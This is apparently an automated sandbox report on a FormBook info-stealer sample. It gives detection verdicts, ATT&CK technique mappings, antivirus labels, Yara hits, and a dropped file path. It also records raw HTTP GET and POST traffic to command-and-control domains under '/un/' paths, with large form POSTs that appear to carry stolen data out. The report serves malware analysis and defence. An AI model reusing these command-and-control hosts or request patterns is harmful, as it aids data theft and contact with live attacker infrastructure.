
Analysis Report ACre0O2rKa.bin

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 229424
Start date: 12.05.2020
Start time: 14:16:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 37s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: ACre0O2rKa.bin (renamed file extension from bin to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@22/6@8/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 57.2% (good quality ratio 53.1%)
  • Quality average: 72.6%
  • Quality standard deviation: 30.4%
HCA Information:
  • Successful, ratio: 94%
  • Number of executed functions: 104
  • Number of non-executed functions: 345
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 72.247.224.69, 8.248.133.254, 8.248.113.254, 8.248.117.254, 67.26.75.254, 8.248.135.254, 23.42.27.172
  • Excluded domains from analysis (whitelisted): e5684.g.akamaiedge.net, fs.microsoft.com, audownload.windowsupdate.nsatc.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, site-cdn.onenote.net.edgekey.net
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Whitelisted: false
Threat: FormBook
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons; additional UI automation would likely extend the observed behavior.



Mitre Att&ck Matrix

Techniques are listed per tactic column. Numbers following a technique are the report's signature-hit badges, reproduced as extracted.

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link
Execution: Execution through Module Load (1); Exploitation for Client Execution (1); Graphical User Interface (1); Scheduled Task; Command-Line Interface; Graphical User Interface
Persistence: Registry Run Keys / Startup Folder (1); Port Monitors; Accessibility Features; System Firmware; Shortcut Modification; Modify Existing Service
Privilege Escalation: Process Injection (512); Accessibility Features; Path Interception; DLL Search Order Hijacking; File System Permissions Weakness; New Service
Defense Evasion: Masquerading (1); Software Packing (11); Virtualization/Sandbox Evasion (2); Process Injection (512); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3)
Credential Access: Credential Dumping (1); Network Sniffing; Input Capture; Credentials in Files; Account Manipulation; Brute Force
Discovery: Virtualization/Sandbox Evasion (2); Process Discovery (2); Security Software Discovery (221); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (12)
Lateral Movement: Remote File Copy (1); Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot; Third-party Software
Collection: Email Collection (1); Man in the Browser (1); Data from Local System (1); Input Capture; Data Staged; Screen Capture
Exfiltration: Data Encrypted (1); Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer; Data Transfer Size Limits
Command and Control: Standard Cryptographic Protocol (1); Remote File Copy (1); Standard Non-Application Layer Protocol (3); Standard Application Layer Protocol (13); Standard Cryptographic Protocol; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Premium SMS Toll Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: Modify System Partition; Device Lockout; Delete Device Data

Signature Overview



AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exe; Avira: detection malicious, Label: TR/Injector.jjaxf
Antivirus detection for sample
Source: ACre0O2rKa.exe; Avira: detection malicious, Label: TR/Injector.jjaxf
Multi AV Scanner detection for domain / URL
Source: http://www.molestuk.com/un/; Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exe; Virustotal: Detection: 74%
Source: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exe; ReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted file
Source: ACre0O2rKa.exe; Virustotal: Detection: 74%
Source: ACre0O2rKa.exe; ReversingLabs: Detection: 82%
Yara detected FormBook
Source: Yara match; File source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exe; Joe Sandbox ML: detected
Machine Learning detection for sample
Source: ACre0O2rKa.exe; Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.ACre0O2rKa.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 1.2.ACre0O2rKa.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.0.5jd0x8e0uzsd8l.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 20.0.5jd0x8e0uzsd8l.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 14.0.5jd0x8e0uzsd8l.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.5jd0x8e0uzsd8l.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 0.0.ACre0O2rKa.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 17.0.5jd0x8e0uzsd8l.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 14.2.5jd0x8e0uzsd8l.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.5jd0x8e0uzsd8l.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 17.2.5jd0x8e0uzsd8l.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 16.0.5jd0x8e0uzsd8l.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 1.0.ACre0O2rKa.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\ACre0O2rKa.exe; Code function: 4x nop then pop edi; 1_2_004140C3
Source: C:\Windows\SysWOW64\WWAHost.exe; Code function: 4x nop then pop edi; 3_2_003D40C3

Networking:

HTTP GET or POST without a user agent
Source: global traffic; HTTP traffic detected: GET /un/?FlAXKZ=l6LFnp+km1quSDfZ52pjMt+mpe8a6/Plu1YIxmUUFqmKbrXpmQH/nh6AvQPYfwnZFddr&Zj=Q0GXBhexZ8l0 HTTP/1.1 | Host: www.transferas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /un/?Zj=Q0GXBhexZ8l0&FlAXKZ=BbNiF8OZmcUXoGx97jwAL0Yq+M1uZNoYeKxNjPTk177moqQXSalD+Nu5YzJHjuOZjPRG HTTP/1.1 | Host: www.websitenhatrang.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /un/?FlAXKZ=FOOtQ47hxgivzhxjr6h1MB4NVmrbwUaO2ECBjx9yvE+swNR50NzcZ+CMbkeeVfoV1zfJ&Zj=Q0GXBhexZ8l0 HTTP/1.1 | Host: www.travelbytravant.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /un/?Zj=Q0GXBhexZ8l0&FlAXKZ=7biYcUKhaRccwNcCc46fPF0jINvQjsFEYDcnDnJGupRrwRyvJO/A57AYTW9xJbMK+XXE HTTP/1.1 | Host: www.starsaunainstallations.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View; IP Address: 209.99.64.55
Source: Joe Sandbox View; IP Address: 23.20.239.12
Internet Provider seen in connection with other malware
Source: Joe Sandbox View; ASN Name: unknown
Source: Joe Sandbox View; ASN Name: unknown
Uses a known web browser user agent for HTTP communication
Source: global traffic; HTTP traffic detected: POST /un/ HTTP/1.1 | Host: www.websitenhatrang.com | Connection: close | Content-Length: 190296 | Cache-Control: no-cache | Origin: http://www.websitenhatrang.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.websitenhatrang.com/un/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic; HTTP traffic detected: POST /un/ HTTP/1.1 | Host: www.travelbytravant.com | Connection: close | Content-Length: 190296 | Cache-Control: no-cache | Origin: http://www.travelbytravant.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.travelbytravant.com/un/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic; HTTP traffic detected: POST /un/ HTTP/1.1 | Host: www.starsaunainstallations.com | Connection: close | Content-Length: 190296 | Cache-Control: no-cache | Origin: http://www.starsaunainstallations.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.starsaunainstallations.com/un/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Downloads files from webservers via HTTP
Source: global traffic; HTTP traffic detected: GET /un/?FlAXKZ=l6LFnp+km1quSDfZ52pjMt+mpe8a6/Plu1YIxmUUFqmKbrXpmQH/nh6AvQPYfwnZFddr&Zj=Q0GXBhexZ8l0 HTTP/1.1 | Host: www.transferas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /un/?Zj=Q0GXBhexZ8l0&FlAXKZ=BbNiF8OZmcUXoGx97jwAL0Yq+M1uZNoYeKxNjPTk177moqQXSalD+Nu5YzJHjuOZjPRG HTTP/1.1 | Host: www.websitenhatrang.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /un/?FlAXKZ=FOOtQ47hxgivzhxjr6h1MB4NVmrbwUaO2ECBjx9yvE+swNR50NzcZ+CMbkeeVfoV1zfJ&Zj=Q0GXBhexZ8l0 HTTP/1.1 | Host: www.travelbytravant.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /un/?Zj=Q0GXBhexZ8l0&FlAXKZ=7biYcUKhaRccwNcCc46fPF0jINvQjsFEYDcnDnJGupRrwRyvJO/A57AYTW9xJbMK+XXE HTTP/1.1 | Host: www.starsaunainstallations.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Performs DNS lookups
Source: unknown; DNS traffic detected: queries for: www.vrtravelers.net
Posts data to webserver
Source: unknown; HTTP traffic detected: POST /un/ HTTP/1.1 | Host: www.websitenhatrang.com | Connection: close | Content-Length: 190296 | Cache-Control: no-cache | Origin: http://www.websitenhatrang.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.websitenhatrang.com/un/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Urls found in memory or binary data
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.599845164.0000000002630000.00000004.00000001.sdmp; String found in binary or memory: http://ns.adob1
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.39pk3ol88h.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.39pk3ol88h.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.39pk3ol88h.com/un/www.glonetsupplies.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.39pk3ol88h.comReferer:
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.advantahc.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.advantahc.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.advantahc.com/un/www.yapzhiying.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.advantahc.comReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.assomusicaleincarville.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.assomusicaleincarville.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.assomusicaleincarville.com/un/www.rozaswar.net
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.assomusicaleincarville.comReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.ethansung.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.ethansung.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.ethansung.com/un/www.zhishengda.net
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.ethansung.comReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.glonetsupplies.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.glonetsupplies.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.glonetsupplies.com/un/www.transferas.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.glonetsupplies.comReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.molestuk.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.molestuk.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.molestuk.com/un/S
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.molestuk.comReferer:
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.natashadenness.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.natashadenness.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.natashadenness.com/un/www.assomusicaleincarville.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.natashadenness.comReferer:
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.rozaswar.net
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.rozaswar.net/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.rozaswar.net/un/www.tactilon.online
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp; String found in binary or memory: http://www.rozaswar.netReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.starsaunainstallations.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.starsaunainstallations.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.starsaunainstallations.com/un/www.ethansung.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.starsaunainstallations.comReferer:
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.tactilon.online
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.tactilon.online/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.tactilon.online/un/www.advantahc.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.tactilon.onlineReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.transferas.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.transferas.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.transferas.com/un/www.websitenhatrang.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.transferas.comReferer:
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp, WWAHost.exe, 00000003.00000002.1229698588.0000000003A69000.00000004.00000001.sdmpString found in binary or memory: http://www.travelbytravant.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmp, WWAHost.exe, 00000003.00000002.1229698588.0000000003A69000.00000004.00000001.sdmpString found in binary or memory: http://www.travelbytravant.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.travelbytravant.com/un/www.starsaunainstallations.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.travelbytravant.comReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.vrtravelers.net
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.vrtravelers.net/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.vrtravelers.net/un/www.39pk3ol88h.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.vrtravelers.netReferer:
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.websitenhatrang.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.websitenhatrang.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.websitenhatrang.com/un/www.travelbytravant.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.websitenhatrang.comReferer:
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.yapzhiying.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.yapzhiying.com/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.yapzhiying.com/un/www.molestuk.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.yapzhiying.comReferer:
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.zhishengda.net
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.zhishengda.net/un/
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.zhishengda.net/un/www.natashadenness.com
Source: explorer.exe, 00000002.00000003.1088048858.0000000009D0C000.00000004.00000001.sdmpString found in binary or memory: http://www.zhishengda.netReferer:
Source: explorer.exe, 00000002.00000000.624315467.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: WWAHost.exe, 00000003.00000002.1224402013.00000000007F8000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?hl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=190
Source: WWAHost.exe, 00000003.00000002.1229851131.0000000003D5F000.00000004.00000001.sdmpString found in binary or memory: https://www.starsaunainstallations.com/un/?Zj=Q0GXBhexZ8l0&FlAXKZ=7biYcUKhaRccwNcCc46fPF0jINvQjsFEYD
Source: WWAHost.exe, 00000003.00000002.1229851131.0000000003D5F000.00000004.00000001.sdmpString found in binary or memory: https://www.starsaunainstallations.com/un/?Zj=Q0GXBhexZ8l0&FlAXKZ=7biYcUKhaRccwNcCc46fPF0jINvQjs
